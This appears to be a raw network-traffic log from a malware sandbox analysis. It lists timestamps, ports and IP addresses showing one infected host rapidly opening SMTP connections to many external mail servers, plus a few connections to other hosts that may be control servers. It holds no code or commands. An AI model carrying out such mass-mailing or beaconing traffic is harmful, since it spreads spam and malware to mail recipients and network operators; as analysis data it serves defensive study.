                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.187700987 CET5001025192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.187927008 CET5001125192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.208323956 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.208478928 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.215589046 CET255000898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.226610899 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.264710903 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.264916897 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.301594019 CET255001067.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.322987080 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.331408978 CET255001198.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.331446886 CET255001198.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.331552982 CET5001125192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.368607044 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.395237923 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.602972031 CET5000125192.168.2.374.125.200.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.666596889 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.790514946 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.846694946 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.854362011 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.854424000 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.854501009 CET5001125192.168.2.398.136.96.75
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.855185986 CET5000125192.168.2.374.125.200.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856515884 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856885910 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856911898 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856920958 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856936932 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856952906 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856978893 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.856987953 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857280970 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857551098 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857583046 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857844114 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857844114 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857844114 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857844114 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.857920885 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.858042002 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.858042002 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.858073950 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.858073950 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.858108044 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.880884886 CET5001425192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.881624937 CET5001525192.168.2.3203.134.71.161
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.913969040 CET2550003217.69.139.150192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.914010048 CET2550003217.69.139.150192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.968471050 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.968539000 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.968589067 CET2550003217.69.139.150192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.968697071 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.968753099 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:50.997574091 CET255001198.136.96.75192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.023379087 CET2550003217.69.139.150192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.023587942 CET5000325192.168.2.3217.69.139.150
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.025459051 CET2549991103.224.212.34192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.025485992 CET2549991103.224.212.34192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.083256960 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.083333015 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.083385944 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.083417892 CET5001325192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.134649992 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.146330118 CET2550015203.134.71.161192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.146593094 CET5001525192.168.2.3203.134.71.161
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.154810905 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.163674116 CET5001625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.173919916 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.174635887 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.174746990 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.197741985 CET255001367.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.205871105 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.216726065 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.336859941 CET2549902211.29.132.250192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.399930000 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.399971962 CET4990225192.168.2.3211.29.132.250
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.401108027 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.415399075 CET4990225192.168.2.3211.29.132.250
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.415648937 CET5000125192.168.2.374.125.200.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.421361923 CET2550015203.134.71.161192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.421406984 CET2550015203.134.71.161192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.421483040 CET5001525192.168.2.3203.134.71.161
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.421535015 CET5001525192.168.2.3203.134.71.161
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.435369968 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.489990950 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.490181923 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.520648956 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.527299881 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.531528950 CET2550016203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.531735897 CET5001625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.567617893 CET2549991103.224.212.34192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.603063107 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.606034994 CET4993525192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.686199903 CET2550015203.134.71.161192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.740025997 CET2549902211.29.132.250192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.740494967 CET2549902211.29.132.250192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.778677940 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.801238060 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.806217909 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.809428930 CET4990225192.168.2.3211.29.132.250
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.893381119 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.941663027 CET255000174.125.200.26192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.941873074 CET5000125192.168.2.374.125.200.26
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.955950022 CET2550016203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.956496000 CET2550016203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.956619978 CET5001625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.993804932 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:51.993807077 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.463936090 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464025021 CET5001625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464206934 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464238882 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464351892 CET4990225192.168.2.3211.29.132.250
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464399099 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.464497089 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.543935061 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.544866085 CET5001925192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.631088018 CET2549991103.224.212.34192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.631149054 CET2549991103.224.212.34192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.631335020 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.632330894 CET4999125192.168.2.3103.224.212.34
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.651603937 CET5002025192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.679411888 CET5002125192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.684062958 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.684163094 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.684487104 CET5002240500192.168.2.3111.95.202.239
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.705252886 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.743616104 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.744462967 CET2550012104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.744528055 CET5001225192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.748945951 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.749056101 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.785610914 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.785665989 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.785712004 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.785779953 CET4984725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.807878971 CET5002425192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.821903944 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.822019100 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.824922085 CET2550019104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.825036049 CET5001925192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.828389883 CET2549902211.29.132.250192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.832565069 CET2550016203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.873927116 CET5002525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.980077982 CET255002027.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.980249882 CET5002025192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.989456892 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:52.989571095 CET5002525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.018148899 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.018305063 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.022789001 CET2549877211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.022973061 CET4987725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.033937931 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.034087896 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.042211056 CET5002625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.045825005 CET2550021203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.046242952 CET5002125192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.095479012 CET5002725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.100502014 CET2549847211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.119322062 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.119461060 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.133739948 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.133775949 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.133908033 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.135891914 CET255002427.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.136055946 CET5002425192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.146389008 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.146533012 CET5002525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.163896084 CET5002825192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.227600098 CET2550019104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.227711916 CET5001925192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.249746084 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.249778986 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.249910116 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.249910116 CET5002325192.168.2.367.195.204.72
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.259485006 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.259517908 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.259634972 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.261867046 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.261893034 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.262183905 CET5002525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.269500971 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.304868937 CET255002898.136.96.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.305104017 CET5002825192.168.2.398.136.96.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.308656931 CET255002027.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.308922052 CET5002025192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.319247961 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.326992989 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.327843904 CET5003025192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.330073118 CET5003125192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.334139109 CET2549877211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.334917068 CET2549877211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.335042000 CET4987725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.365451097 CET255002367.195.204.72192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.378340960 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.378407955 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.378649950 CET5002525192.168.2.367.195.204.74
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.379484892 CET2550027104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.379934072 CET5002725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.383387089 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.383507967 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.400021076 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.400059938 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.400140047 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.400645018 CET5001825192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.407105923 CET2550026203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.407289982 CET5002625192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.421263933 CET5003225192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.464174032 CET255002427.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.465714931 CET2550021203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.465960979 CET2550021203.59.218.120192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.466128111 CET5002125192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.466842890 CET5002425192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.467626095 CET5002125192.168.2.3203.59.218.120
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.494203091 CET255002567.195.204.74192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.498912096 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.499041080 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.508574009 CET2550019104.47.71.138192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.508738041 CET5001925192.168.2.3104.47.71.138
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.512065887 CET255002027.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.512340069 CET5002025192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.526331902 CET5003325192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.535377979 CET255003267.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.535598040 CET5003225192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.540524960 CET255001898.136.96.76192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.557889938 CET2549897211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.558037043 CET4989725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.560825109 CET4991980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.562921047 CET5003480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.577178955 CET5003525192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.611082077 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.611757040 CET2550017104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.611876011 CET5001725192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.612965107 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.612997055 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.613022089 CET2550031104.47.71.202192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.613116980 CET5003125192.168.2.3104.47.71.202
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.613271952 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.624775887 CET8049919185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.625778913 CET4991980192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.630284071 CET8050034185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.630415916 CET5003480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.631006956 CET5003480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.633569956 CET2550030211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.633676052 CET5003025192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.640521049 CET255003367.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.640743017 CET5003325192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.650051117 CET255003267.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.650146008 CET5003225192.168.2.367.195.204.77
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.664242983 CET255002427.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.664347887 CET5002425192.168.2.327.32.32.10
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.666531086 CET5003625192.168.2.398.136.96.76
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.680973053 CET255002027.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.681001902 CET255002027.32.32.10192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.686403036 CET2549877211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.692677021 CET255003567.195.204.73192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.692796946 CET5003525192.168.2.367.195.204.73
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.698030949 CET8050034185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.698231936 CET8050034185.215.113.66192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.698307037 CET5003480192.168.2.3185.215.113.66
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.699685097 CET2549877211.29.133.14192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.699912071 CET4987725192.168.2.3211.29.133.14
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.727567911 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.727612972 CET255002967.195.204.79192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.727751970 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.728034973 CET5002925192.168.2.367.195.204.79
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.764070988 CET255003267.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.764132977 CET255003267.195.204.77192.168.2.3
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:53.764328003 CET5003225192.168.2.367.195.204.77
